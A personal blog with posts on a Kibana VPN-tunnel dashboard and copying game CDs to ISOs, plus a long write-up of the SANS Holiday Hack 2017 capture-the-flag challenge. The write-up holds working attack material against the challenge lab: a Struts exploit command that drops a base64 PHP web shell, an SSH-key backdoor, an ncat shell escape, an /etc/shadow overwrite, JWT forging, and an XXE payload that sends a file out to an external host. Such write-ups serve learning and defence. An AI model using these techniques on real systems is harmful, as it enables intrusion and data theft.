I used a data table because if you're working in a large environment, there might not just be a couple of VPN tunnels down, there could be a lot of them.
For the metric, I used count - this tells the number of times that this error was seen per bucket.
For the bucket, I used the Terms bucket - VPNDeviceName. For the sub-bucket, I used the Terms bucket - VpnTunnelName so that we knew which specific tunnels were down. (No sense in fixing every tunnel on the device if only one is down.) These make up the columns in the data table.
I tested the visualization by changing the time frame from the last fifteen minutes to the last day. (If there weren't any down in the last few days, change the time frame to the last few days - trust me, they go down quite a bit - you will eventually see at least one down.) Sure enough, it showed VPN tunnels that had been down in the last day because of a "preshared key mismatch".
Then I did the same steps for the other common errors that happen when VPN tunnels go down.
If they ever change the error messages, I will have to change these, so if there is a better way to do it, please let me know.
Once I saved the visualizations, I saved them to a Dashboard so that I could easily see what was down and why. This saved a lot of troubleshooting time.
Another awesome thing about this: If you change this visualization a small amount, it can be used as a metric to show how often vpn tunnels are down and how often an error occurs. It can be used to find if these vpns going down is a symptom of an even larger problem.
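Added example, not from the original post: the same count-per-device-per-tunnel table the Kibana visualization builds, done in Python over a few constructed FortiGate-style key=value log lines. The field names devname, tunnelname, subtype, msg and error_reason are assumed for the sample; the error strings are the ones quoted above.

```python
"""Added example (not from the original post): aggregate VPN tunnel errors per
device and per tunnel, the way the Kibana data table above does, from sample
key=value log lines.

Assumptions: FortiGate-style key=value lines; the field names used below are
taken from the constructed sample, not from a real device.
"""
import re
from collections import Counter

# Error strings quoted in the post. If the vendor changes the wording, this
# tuple is the one place to update (same problem as the saved searches).
VPN_ERRORS = (
    "probable preshared key mismatch",
    "vpn sa peer proposal does not match local policy",
)

# Constructed sample log lines (not real devices or addresses).
SAMPLE_LOGS = [
    'date=2018-02-15 time=08:01:12 devname=FW-EDGE-01 subtype=vpn level=error '
    'tunnelname=ToBranchA msg="IPsec phase 1 error" error_reason="probable preshared key mismatch"',
    'date=2018-02-15 time=08:01:42 devname=FW-EDGE-01 subtype=vpn level=error '
    'tunnelname=ToBranchA msg="IPsec phase 1 error" error_reason="probable preshared key mismatch"',
    'date=2018-02-15 time=08:02:05 devname=FW-EDGE-01 subtype=vpn level=error '
    'tunnelname=ToBranchB msg="IPsec phase 2 error" error_reason="vpn SA peer proposal does not match local policy"',
    'date=2018-02-15 time=08:02:30 devname=FW-DC-02 subtype=vpn level=notice '
    'tunnelname=ToBranchA msg="IPsec phase 1 status" status=success',
    'date=2018-02-15 time=08:02:55 devname=FW-DC-02 subtype=vpn level=error '
    'tunnelname=ToHQ msg="IPsec phase 1 error" error_reason="probable preshared key mismatch"',
    'date=2018-02-15 time=08:03:00 devname=FW-DC-02 subtype=forward srcip=10.0.0.5 '
    'dstip=10.0.1.9 action=accept',
]

# key=value or key="quoted value with spaces"
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_kv(line: str) -> dict:
    """Turn key=value pairs into a dict; quoted values keep their spaces."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def match_vpn_error(record: dict):
    """Return the known error string this VPN record contains, or None."""
    if record.get("subtype") != "vpn":
        return None
    text = " ".join(record.get(k, "") for k in ("msg", "error_reason")).lower()
    for err in VPN_ERRORS:
        if err in text:
            return err
    return None


def vpn_error_table(lines):
    """Rows of (device, tunnel, error, count), most frequent first: the same
    shape as the Kibana table (terms bucket device > sub-bucket tunnel, metric count)."""
    counts = Counter()
    for line in lines:
        rec = parse_kv(line)
        err = match_vpn_error(rec)
        if err:
            counts[(rec.get("devname", "?"), rec.get("tunnelname", "?"), err)] += 1
    ordered = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [(dev, tun, err, n) for (dev, tun, err), n in ordered]


def down_tunnels(lines):
    """Just the (device, tunnel) pairs that need attention."""
    return sorted({(dev, tun) for dev, tun, _err, _n in vpn_error_table(lines)})


if __name__ == "__main__":
    for dev, tun, err, n in vpn_error_table(SAMPLE_LOGS):
        print(f"{dev:<12} {tun:<12} {n:>3}  {err}")
```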
What other ways have people found to use Kibana?
Sunday, January 28, 2018
Making ISOs Out of Old Game CDs
First of all, I want to point out - I'm not sure about the legality of this. I happen to own some old games. Not sure how long they will last on CDs. I have kids and I can't tell you how many CDs/DVDs they have destroyed. I want to save them because I happen to like playing older games, so I'm converting them from CDs to ISOs for my use only. I'm not distributing them.
If you have a Mac, you can use Disk Utility to convert the CDs to .cdr files. If the games are made for other devices, you will have to convert those .cdr files to .isos. I didn't have much luck converting the .cdr files to .isos with the hdiutil command. The iso was fine for my Mac, but for some reason, it would not open on Windows devices. The Windows devices kept popping up a message that said, "corrupt iso image". That command is:
hdiutil convert <game>.cdr -format UDTO -o <game>.iso
Maybe others will have better luck?
So, I turned to Ubuntu. There's a nice command on there called, "mkisofs". The biggest hurdle I had with this was finding a CD-Rom drive my Ubuntu machine would read. Other than that, it went without a hitch. dd could also be used, but it wasn't good for this case because you have to unmount the device to create an image from it. I'm using an external drive.
The dd command is:
dd if=</dev/cdrom-device> of=<output/directory/andfile.iso>
Ubuntu auto mounts it. Yes, I know, umount, then run dd...
With mkisofs, you don't have to unmount the drive.
The exact command I used was:
mkisofs -lJR -o <gamename.iso> <directoryname>
That's a lower-case L by the way, not a upper-case I.
You can specify multiple directories. Just make sure that for a game for instance, that it has the same directory structure that the installer expects. Another issue you may come across is copyright protections. Sometimes this won't work because of that. Fortunately, for many of my games, I didn't have an issue.
Another interesting thing to note: I could copy the CD directory structure, without making an iso. I had to doctor the multiple cds into one to fit the directory structure that the installer was expecting, but that worked as well, without making an iso.
I did have an issue with game compatibility. I found directions about how to fix it, so it runs fine now. Nothing wrong with the iso, it just wasn't made to be run on newer OSs.
Thursday, January 11, 2018
Holiday Hack 2017 Write Up
Just Copy/Pasted this from my write-up. I'm sick right now, after getting over an illness during the holiday. Probably plenty of typos and stuff. Finished it the night it was due.
Disappointed with myself this year. Didn't work on it as much as I did other challenges. Sick during holiday break. First with an infection I was taking antibiotics for. Then something else.
Reflected over past year. Brother died last year. He was young, so this was unexpected. Christmas was always his favorite time of year. Wasn't really close to him, but I still regret not spending time with him more often. You just feel like you have a long time, and then they're gone in the blink of an eye.
So my heart just wasn't in it this year. Hopefully this is good enough for now. Might add pics later and hope to solve the rest later.
Update: I'm adding pics and stuff. Feeling a little better. I just wanted to note, these challenges aren't necessarily as easy as people make them look in the write-ups. For example, I don't just know stuff. If I really want to learn stuff, I spend a lot of time looking stuff up. It's not easy at first, but you'd be amazed at how much knowledge you can accumulate just by looking things up and learning from others. Don't be discouraged by these write-ups. Be encouraged. If someone like me can do this, so can you. :) Click on any pictures that look small. They look much better in the pop up.
Terminals
1. Candy Cane Striper Terminal
https://unix.stackexchange.com/questions/157997/run-a-binary-owned-by-root-without-sudo
http://man7.org/linux/man-pages/man8/ld.so.8.html
Getting the Candy Cane Striper Up and Running
Log on and read the clue.
If you forget the clue after the screen fills up:
cat /etc/motd
Do a directory listing that shows hidden files and check permissions.
ls -la
The Candy Cane Striper can only be read and written by root, read by group, read by other.
Don't despair. A binary that you can read but not execute can still be run by handing it to the dynamic linker/loader, so you can run a binary owned by root without sudo.
elf@fa03be74d52a:~$ /lib64/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper
2. Linux Command Hijacking Terminal
Running ElfTalkd
Log on and read the clue.
Do a directory listing that shows hidden files to see what is in the current directory. ls -la
Unfortunately, this executable isn't as easy to find as the Candy Cane Striper executable.
find / -name elftalkd isn’t helpful either.
find is usually run from /usr/bin/find, so using the command
/usr/bin/find / -name elftalkd
finds us our executable.
The executable runs out of:
/run/elftalk/bin/elftalkd
So, using the command
/run/elftalk/bin/elftalkd
we can run it.
3. Troublesome Process Terminal
use
ps aux
to look for the executable. It shows that 8 was the pid of the process. Then run:
/bin/kill -9 8
4. Train Startup
The train was compiled to run on an arm architecture.
file trainstartup
file -i trainstartup
This particular linux kernel is an x86 architecture.
uname -a
qemu-arm is an emulator used to run arm executables on an x86-64 architecture. So, simply typing:
qemu-arm ./trainstartup
runs the program.
5. IsIt42 Terminal
This one seems similar to library path hijacking in Windows. In other words, we exploit the order in which Linux looks for libraries. More information about this technique can be found at:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
Note: This only works on c libraries. It does not work on user-defined functions.
First, read the goal of this terminal. The goal is to make the program always return 42. Then read the sample program.
cat isit42.c.un
The part that is returning a random integer is
return rand() % 4096;
rand() is a c library.
The person that commented the code gave a clue as to what to do because they said that the prototype for rand is: int rand(void);
A library must be written to run in place of the one in the isit42 program.
You may use vim or whatever editor you like. Nano is just one of them.
nano isit42test.c
Type the following:
#include <stdio.h>

/* Replacement rand(): loaded ahead of libc's via LD_PRELOAD, so the program's
   rand() % 4096 always evaluates to 42. */
int rand(void){
printf("Highjacking rand() to return 42.\n");
return 42;
}
Save the file.
Next, the shared library should be compiled. Make sure to add the -shared and -fPIC at the end, or it won’t make a shared library.
gcc isit42test.c -o isit42test -shared -fPIC
Now, the library that is desired to be loaded must be found before the actual C library that the program is referencing is found. The isit42 program is also run during this step.
LD_PRELOAD="$PWD/isit42test" ./isit42
It should return 42.
This next part goes by pretty quickly. When you execute the program with the library preloaded, you'll briefly see it state that it's "Returning 42!" or whatever you put in that printf statement in the library you made. That means you successfully hijacked the library. You should see it return 42. As long as you preload your library, it will always return 42.
6. Christmas Songs Data Analysis Terminal
There is a command line program that is often on Linux called sqlite3. It is used for analyzing databases.
sqlite3 christmassongs.db
To see the information about the tables in the databases, you can use the .tables command.
.tables
To see the information about the columns in the tables, you can use the .schema <table> command.
.schema songs
.schema likes
There are two tables in the database. In order to get the most liked song, we have to tell sqlite3 that we want to get information from both tables that is related to each other. In relational databases, we can get information from both tables that is related to each other by the use of primary keys and foreign keys. In this case, the songs.id is the primary key for the songs table. The songs.id is also a foreign key for the likes table. In the likes table, songs.id is known as songid.
So, part of our query will be “where songs.id=likes.songid”.
We use the . notation above to tell sqlite that we want the id column from the songs table, and the songid column from the likes tables.
Often, as a database grows, an entry may be put into the database more than one time. In this case, the song title may have been added more than once. Grouping by the title, as in the next line, collapses all of the repeated titles into one row.
So, part of our query will be “group by songs.title”
As a result of the song title being added more than once, we will have to add the number of likes for that specific title together. We do this by using the “sum” function in sql.
So, part of our query will be sum(likes.like)
We would like to get the most liked song, so we order by the most liked song in descending order. We limit our query to 10, so that we only return the 10 most liked songs. We could limit it to one, but I wanted to make sure that the query was working as intended.
The full query is below:
select sum(likes.like),songs.id,likes.songid,songs.title from songs,likes where songs.id=likes.songid group by songs.title order by sum(likes.like) desc limit 10;
Looks like the Answer is Stairway to Heaven. We'll run the program "runtoanswer" to be sure.
First, exit out of sqlite3.
.quit
Now, run the program.
./runtoanswer
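Added example (not part of the write-up): the query above run with Python's sqlite3 module against a constructed copy of the two tables, with one title entered twice to show why the group by and sum are needed. The extra columns and all of the rows are assumptions; only the column names used in the query come from the write-up.

```python
"""Added example (not from the write-up): run the write-up's sqlite query against
a constructed in-memory copy of the christmassongs.db tables.

Assumed schema (column names in the query are from the write-up, the rest is
constructed):
    songs(id, title, artist)   likes(id, like, datetime, songid -> songs.id)
"""
import sqlite3

SCHEMA = """
CREATE TABLE songs (id INTEGER PRIMARY KEY, title TEXT, artist TEXT);
CREATE TABLE likes (id INTEGER PRIMARY KEY, "like" INTEGER, datetime TEXT,
                    songid INTEGER REFERENCES songs(id));
"""

# Constructed rows: "Stairway to Heaven" was entered twice (ids 1 and 3), so its
# likes are split across two song rows.
SONGS = [
    (1, "Stairway to Heaven", "Led Zeppelin"),
    (2, "Jingle Bells", "Traditional"),
    (3, "Stairway to Heaven", "Led Zeppelin"),
    (4, "Silent Night", "Traditional"),
]
LIKES = (
    [(1, "2017-12-01", 1)] * 3    # song 1: 3 likes
    + [(1, "2017-12-02", 3)] * 3  # song 3 (same title): 3 likes
    + [(1, "2017-12-03", 2)] * 5  # Jingle Bells: 5 likes
    + [(1, "2017-12-04", 4)]      # Silent Night: 1 like ...
    + [(0, "2017-12-05", 4)] * 4  # ... and 4 rows with like=0
)

# The query from the write-up, verbatim.
QUERY = """
select sum(likes.like),songs.id,likes.songid,songs.title
from songs,likes
where songs.id=likes.songid
group by songs.title
order by sum(likes.like) desc
limit 10;
"""

# Same join, but grouped by song row instead of title, for comparison.
PER_ROW_QUERY = """
select sum(likes.like), songs.id, songs.title
from songs join likes on songs.id = likes.songid
group by songs.id
order by sum(likes.like) desc;
"""


def build_db() -> sqlite3.Connection:
    """Create the two tables in memory and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO songs VALUES (?, ?, ?)", SONGS)
    conn.executemany('INSERT INTO likes ("like", datetime, songid) VALUES (?, ?, ?)', LIKES)
    conn.commit()
    return conn


def most_liked_by_title(conn):
    """(total_likes, title) rows from the write-up's query, best first."""
    return [(row[0], row[3]) for row in conn.execute(QUERY)]


def most_liked_by_row(conn):
    """(total_likes, song id, title) when grouping by song row instead.
    The duplicated title loses here because its likes are not added together."""
    return [tuple(row) for row in conn.execute(PER_ROW_QUERY)]


if __name__ == "__main__":
    db = build_db()
    print("by title:", most_liked_by_title(db))
    print("by row:  ", most_liked_by_row(db))
```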
7. Web Log Terminal Challenge
The goal of this challenge was to analyze an apache access log to find the least common browser. Fortunately, it is plain text, and has well defined delimiters, so if one has a decent understanding of some Linux command line tools, it shouldn't be tough. If not, Google is your friend. There are many ways to solve this one, only a google search away. Here is one way:
cat access.log | awk -F\" '{print $6}' | sort -n | uniq -c | sort -n | head -n 10
Broken down:
cat access.log | - means send the access log file into the next command.
awk -F\" '{print $6}' | - the delimiter in this log is a " character. Separate each line into pieces at that delimiter. I only want the 6th piece, which is the user agent string. Send the 6th piece to the next command.
sort -n | - sort the user agent strings so that identical ones end up next to each other (uniq only collapses adjacent duplicates). Send that output to the next command.
uniq -c | - collapse the repeated user agents into one line each, prefixed with the number of times it occurred. Send those to the next command.
sort -n | - sort those lines by that occurrence count. Send that output to the next command.
head -n 10 - only show me the first 10 in the output. Since the default order that it is sorted is ascending, the first one of the list will be the least used user agent.
8. Shadow Restoration Challenge
Resources:
https://serverfault.com/questions/133229/what-is-the-shadow-group-used-for
man sudo - found a switch to run as a group. (I did this on another linux box. The game terminal wouldn't let me do it.)
The goal of this one is to restore the shadow file from a backup.
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
This user has the ability to run the find command. You can see that near the bottom where it says, "User elf may run the following commands..." It also says that the user can run it without a password: "NOPASSWD". And that elf is a member of the shadow group: "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any user is not known, so use the -g switch to run as a group. The group in Linux responsible for password management - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying /etc/shadow.bak. One could actually use /etc/shadow.bak in place of the {} and it will work just fine. It's just simpler to use the {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
Holiday Hack Challenge Questions
Fortunately, this user is a member of the sudo group. This can be found by running:
sudo -l
Shadow Terminal |
This user has the ability to run the find command. You can see that near the bottom where it says, "User elf may run the following commands..." It also says that the user can run it without a password. it says, "NOPASSWD". And that elf is a member of the shadow group. "(elf : shadow)".
If sudo find /etc/shadow.bak -exec cp {} /etc/shadow \; is used, the elf password is required. Unfortunately, that password is not known.
The sudo command can be used as another user or group. The password for any users is not known, so use the -g switch to use a group. The group in Linux responsible for password managment - as well as other things - is the shadow group. The following command works, without a password.
sudo -g shadow find /etc/shadow.bak -exec cp {} /etc/shadow \;
The {} is another way of saying /etc/shadow.bak. One could actually use /etc/shadow.bak in place of the {} and it will work just fine. It's just simpler to use the {} syntax.
The command says, “Run as a member of the shadow group”, “Find the shadow backup.”, “Overwrite the shadow file with the shadow backup”.
After the shadow file is restored, the inspect_da_box program must be run to complete this terminal.
inspect_da_box
[Screenshot: Shadow File Successfully Restored]
Holiday Hack Challenge Questions
1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?
The title of that page is About This Book.
2) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server? What is Alabaster Snowball's password?
3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
FileStor. For the record, I could log onto IPC$ as well. Just couldn’t get a directory listing. Seemed to let me change to another directory, though. Also, it gives a different error message when I try to write to the directory using “put” so it might be writable. FileStor gives NT_STATUS_ACCESS_DENIED opening remote file \test when I try to put test to it. IPC$ gives NT_STATUS_OBJECT_NAME_NOT_FOUND error when I try to put a test file to it.
[Screenshot: SSH Port Forwarding to SMB Server]
[Screenshot: SMB Protocol Via Browser]
[Screenshot: Finder Asking Permission To Access Share]
[Screenshot: Entering Alabaster's Creds to Access Share]
[Screenshot: Selecting Share]
[Screenshot: Contents of FileStor]
4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?
[Screenshot: SSH Port Forwarding to Mail Server]
[Screenshot: Setting Up Browser Proxy - Firefox]
[Screenshot: E-Mail Showing Where Page 4 Was On the Mail Server]
[Screenshot: Mail Server - Page 4 - Rise of the Lollipop Guild]
Elves and Munchkins don’t like each other. They have a long-standing feud. It’s never been proven, but the Elves believe that the Munchkins have sent Munchkin Moles to the North Pole.
5) How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? What are the names of at least six insider threat moles? Who is throwing the snowballs from the top of the North Pole Mountain, and what is your proof?
a) 8 infractions are required to be marked as naughty on Santa’s Naughty and Nice List. (The lowest number of infractions I could find for a naughty person was 8.)
b) The insider moles are: Bog Questrian, Bini Aru - these two are known because they were mentioned in the BOLO: Munchkin Mole Advisory.
[Screenshot: Known Munchkin Moles]
c) The Abominable Snow Monster, AKA Bumble, is throwing the giant snowballs - a page of the great book states that he’s throwing the snowballs - however, he’s under the influence of something magical that he ate. (If one plays through the game, it's revealed that he is throwing snowballs as well.)
[Screenshot: Great Book Page 5]
[Screenshot: Game Reveal]
6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?
[Screenshot: SSH Port Forwarding to EAAS]
ssh -L 9000:10.142.0.5:80 alabaster_snowball@l2s.northpolechristmastown.com
ssh -L 9001:10.142.0.13:80 alabaster_snowball@l2s.northpolechristmastown.com
7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?
I know from exploiting the e-mail server that one should probably use a DDE Injection in order to phish Alabaster Snowball to retrieve this page. It was hinted in some e-mails that Alabaster would click on any links in e-mails containing the words “gingerbread”, “cookie”, and “recipe”. Shinny Upatree also gives the hint in the stocking talking about DDE. He also said that he was reprimanded for a security violation and that Alabaster installs unnecessary software on the EMI server all the time, including Microsoft Office. DDE Injection can be done with Word, Excel, Outlook, PowerPoint - probably more - but those are the products I've seen it done in articles.
Unfortunately, I couldn’t get any of my exploit attempts to work. I’ll detail my attempts later in this write-up.
8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?
I just got into the edb/ldap server on the night that this was due, so I didn't get this one. I did get it afterwards though. I'm holding off on reading write-ups until I solve them. It was the Wizard of Oz. :)
I retrieved the np-auth token via XSS. I knew that I needed the np-auth item because of the web page source code. Click on the Support Link and find the XSS vulnerability. You can use a marker to test, or simply try to pop an alert.
It kept saying "Alert, Hacker" when I tried certain XSS payloads. I just played around with it a bit to find out what it was filtering on. An easier way would have been to check to see if there was any script that contained "Alert, Hacker!". It didn't take long to figure out what it was alerting on, though. It was just the word script. So, I'd have to try payloads that either obfuscated the word "script" or payloads that didn't contain the word script.
It won't let you put the marker in the Username and E-Mail because they have to be a certain format. So, put a valid username and e-mail in each text box and add the marker script to the message. Check the web page source code.
Looks like the Message part is vulnerable. When you look at the source code, that is where this is located.
Try filter evasion payloads until one pops an alert.
Now, change the payload so it dials back to you.
I had a script running that captures cookies, but as long as you have something that shows the request, you should be fine. The script just captures multiple cookies, or whatever I'm asking for - in this case np-auth. I just named it cookiecatcher.php because I originally thought I needed a cookie. I only set it up this way because I wanted to be certain I didn't miss it. This script saves the cookies to a log that I can look at later.
I decoded the token using pyjwt. It didn’t have a key, so decoding it was as simple as adding ‘’ for the key. The decoded token looked kind of like ldap.
I cracked the secret using jwtcrack. It was ‘3lv3s’.
I then used py-jwt to forge a new token with the decoded token and changing the “expires” date.
9) Which character is ultimately the villain causing the giant snowball problem? What is the villain's motive?
Glenda The Good Witch. She wants to start a war between munchkins and elves so that she can profit from selling magic/spells to both sides.
L2S Server
This server was running Apache Struts, and was vulnerable to the exploit detailed here: https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
Sparkle Redberry gave the hints for this challenge.
Always check the source of the webpage. The webpage indicated that there was another website. dev.northpolechristmastown.com.
The Dev Version shows that it's running Apache Struts.
I used the tool mentioned in the SANS Pen Testing blog post mentioned earlier to upload a web shell: CVE-2017-9805.py. I named it struts_exploit.py so I would remember what it was way in the future.
python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo 'PGh0bWw+Cjxib2R5Pgo8Zm9ybSBtZXRob2Q9IkdFVCIgbmFtZT0iPD9waHAgZWNobyBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+Ij4KPGlucHV0IHR5cGU9IlRFWFQiIG5hbWU9ImNtZCIgaWQ9ImNtZCIgc2l6ZT0iODAiPgo8aW5wdXQgdHlwZT0iU1VCTUlUIiB2YWx1ZT0iRXhlY3V0ZSI+CjwvZm9ybT4KPHByZT4KPD9waHAKICAgIGlmKCRfR0VUWydjbWQnXSkKICAgIHsKICAgICAgICBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKICAgIH0KPz4KPC9wcmU+CjwvYm9keT4KPHNjcmlwdD5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiY21kIikuZm9jdXMoKTs8L3NjcmlwdD4KPC9odG1sPg==' > /var/www/html/quackquackhere.php"
That base64 is a web shell.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
Then you just visit the webpage with your shell file name tacked on the end and the command you want to run.
https://l2s.northpolechristmastown.com/quackquackhere.php?ls
I found it easier to upload my public key into the authorized_keys file and log on via ssh before I found the password. Unfortunately, logging in via ssh left me in a restricted shell.
python struts_exploit.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "/bin/echo '<my pub key here>' >> /home/alabaster.snowball/.ssh/authorized_keys"
I'm not afraid of people having my public key. Now if I showed my private key, that would be another story. I'm reverting to a snap shot on that VM though. So the key won't be on there at any rate whether it's safe or not.
Then I could just ssh in, presenting my private key. Learned this in NetWars. :) Like so:
ssh -i <private key file> alabaster_snowball@l2s.northpolechristmastown.com
Escaping RBash
I tried using tee as detailed here: https://pen-testing.sans.org/blog/2017/12/06/a-spot-of-tee, to break out of rbash. I was unsuccessful.
I found out that I could do dot (.) sourcing to get around not being able to use /. to run a command. I still couldn’t get my script to run properly. I was probably trying a payload that wasn’t correct.
https://superuser.com/questions/176783/what-is-the-difference-between-executing-a-bash-script-vs-sourcing-it
Since I couldn’t get the tee method to work, I found another way to escape rbash. I looked at alabaster_snowball’s .bashrc file in his home directory and found the code that was restricting users to the directory I was in and the path to the programs I was able to run in the restricted shell.
cat /home/alabaster.snowball/.bashrc
So then I did “ls /usr/local/rbin” to see what programs I could use.
I’ve used ncat several times and remembered that I could execute commands with it. So I tried ncat -l 59000 --exec “/bin/bash” &. Then I connected to my listener by typing ncat 127.0.0.1 59000.
If you've ever dealt with ncat, sometimes it is hard to tell that there is a prompt there. It looks like a blank space, but if you type a command, like cd .. and ls, it will show the output. I know I escaped because in rbash, you can't change directories.
From the escaped shell, I could observe what other users were doing by typing “/bin/ps aux”. Someone locked down the $PATH, so I had to resort to full path naming to run programs - also called absolute paths. I learned quite a bit by watching the other players and downloading some of their exploit attempts. I carefully examined the exploits. Out of the restricted shell, I could type /bin/cat /etc/hosts to find some machines around me. I also used nmap to scan the machines around the l2s server.
I found Alabaster Snowball’s password in the tomcat dev files.
From the hints, I realized that I didn’t actually have to do much on this box other than to use it as a pivot into the internal network.
ssh -L 9000:10.142.0.x:<port number I’m interested in here> alabaster.snowball@l2s.northpolechristmastown.com
SMB Server
After scanning the systems using the hint provided by Holly Evergreen, I found an SMB Server. smbclient, for whatever reason wouldn’t work for me. So, I instead used ssh forwarding to forward the ip of the smb server to my machine. I have the pics posted earlier - in the "Holiday Hack Questions" Section.
ssh -L 9000:10.142.0.7:445
I didn’t want to use port 445 because I would have to sudo.
My machine is a Mac, so I opened up a browser and typed smb://127.0.0.1:9000. Finder picked up that I wanted to open a share and prompted me if I wanted to open the share with Finder. So, I clicked OK. Then a login prompt popped up. I put in Alabaster Snowball’s credentials. They were username: alabaster_snowball; password: stream_unhappy_buy_loss.
I obtained the BOLO - Munchkin Mole Report.docx, GreatBookPage3.pdf, MEMO - Password Policy Reminder.docx, Naughty and Nice List.csv, Naughty and Nice list.docx.
Mail Server
The nmap scan also revealed a mail server at 10.142.0.5. I tried reading e-mails and sending phishing e-mails by logging in via telnet. Then I read the hints and found out that there might be an easier way in. So, I set up ssh forwarding, set my browser to use a proxy, and typed “10.142.0.5/robots.txt” into my browser. I looked at robots.txt and found a file that was disallowed. It was the source code for the cookie: cookie.txt.
The hints for this one were given by: Pepper Minstix. I found a useful resource that lets people test node.js modules in their browser called runkit + npm. I found the aes256 module and played around with it.
var aes256 = require("aes256"); // aes256 1.0.2 on RunKit
var key = 'santaisonabender';
var encrypted = 'AAAAAAAAAAAAAAAAAAAAAA'; // 22 A's: a base64-encoded IV with no ciphertext behind it
var plaintext = '';
console.log(encrypted);
var decrypted = aes256.decrypt(key, encrypted);
console.log(decrypted);
if (decrypted === plaintext) {
    console.log('equal');
}
I found out that the IV is completely dropped by this module. In the program, it’s aes256 encrypted and base64 encoded. So to decrypt, it would be base64 decoded and aes256 decrypted. 22 A’s are required because when 16 characters - the IV - are base64 encoded, it’s drawn out to 22 characters. I played with base64 encoding to see what happens, to come by that bit of information that 16 characters are padded out to 22.
The hints provided by Pepper Minstix hinted at changing the cookie. The code appeared as though it compared the plaintext variable in the decryption function to the plaintext value in the cookie. The plaintext variable in the decryption function’s value is gotten by passing the key and the ciphertext from the cookie to the decryption algorithm. If the ciphertext is 22 characters, those characters are dropped, leaving it blank. I’m not sure why it’s blank given that the key should still be passed to the algorithm, but it worked, so I didn’t really question it. I would guess it’s the way that node.js handles undefined objects, but I’m not sure.
I changed the cookie in my browser, using Developer Tools in Firefox. I left the plaintext blank and put 22 A’s in the cipher text.
Then I looked at the response and saw /account.html. Typed in 10.142.0.5/account.html and I was logged into alabaster.snowball’s account. I found that I could log into other accounts using the same method as well, but changing the user account to whatever user I wanted to be. In alabaster.snowball’s account, I found hints to get access to the EMI server. Namely, Alabaster saying that he would click on any link in any e-mail containing the words gingerbread, cookie, recipe. Minty Candycane sent Alabaster Snowball an e-mail asking about DDE Injection, as well as sending a proof of concept found here: http://mail.northpolechristmastown.com/attachments/dde_exmaple_minty_candycane.png.
I posted those pics earlier, in the section about the Holiday Hack Challenge Questions.
EAAS Server
The nmap scan found this server at 10.142.0.13. The hints for this challenge were provided by Sugar Plum Mary. Again, I used ssh port forwarding to pivot to this machine, and changed the proxy in my browser to allow me to see this web page.
Logging onto the eaas server, there is an area to submit requests to build elves using xml.
[Screenshot: EAAS Web Site]
Click on the Elf Checking Service to Exploit this web site.
[Screenshot: Not always Upload Capability that is vulnerable, but when it is....]
This particular site is vulnerable to an External XML Entities attack. The attack detailed here works: https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities. Below is the dtd file that I submitted to the eaas server:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://x.x.x.x:6666/sweets.dtd"> %extentity;
%inception;
%sendit;
]
<
Below is the dtd file that I put on my server that I use to test vulnerabilities with.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % dataismine SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://x.x.x.x:6667/?%dataismine;'>">
[Screenshot: Upload DTD XXE Exploit that borrows a file...]
I used the python module SimpleHTTPServer to serve sweets.dtd so I didn’t have to serve a full website. I made sure I was in a directory I wasn’t afraid for people to see the files in, considering that SimpleHTTPServer serves the current directory by default.
python -m SimpleHTTPServer 6666
Then I had a netcat listener running to catch greatbook.txt:
nc -nvlp 6667 > greatbook.txt
[Screenshot: Serving Sweets on my borrowing Server]
[Screenshot: Great Book Page!]
EMI Server
